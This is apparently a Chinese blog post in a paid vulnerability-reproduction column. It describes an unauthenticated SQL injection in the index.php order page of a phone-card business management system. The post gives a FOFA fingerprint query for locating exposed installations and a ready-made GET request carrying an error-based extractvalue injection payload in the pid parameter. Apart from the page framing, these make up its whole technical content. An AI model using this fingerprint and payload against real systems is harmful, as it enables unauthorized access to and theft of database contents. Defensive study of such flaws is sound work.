【漏洞复现】号卡极团管理系统 index.php SQL注入漏洞

从不学安全

于 2024-04-25 16:14:18 发布

阅读量366

点赞数 5

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签：科技安全网络

99 篇文章 ¥9.90 ¥99.00

订阅专栏

本文详细介绍了号卡极团管理系统中发现的SQL注入漏洞，概述了漏洞情况，通过测绘语句和漏洞复现步骤，揭示了攻击者如何利用此漏洞获取数据库敏感信息。此外，还讨论了漏洞的影响范围。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

号卡极团管理系统是一款专为号卡行业打造的管理系统，它具备一系列强大的功能，能够满足号卡行业推广人员在业务运营中的各类需求。

号卡极团管理系统存在SQL注入漏洞，未授权的攻击者可以通过该漏洞获取数据库敏感信息。

fofa: icon_hash="-795291075" && is_domain=false

GET /order/index.php?pid=1%27%20AND%20(extractvalue(1,concat(0x7e,(select%20md5(1)),0x7e)));--%20htjf HTTP/1.1

号卡极团管理系统<

了解本专栏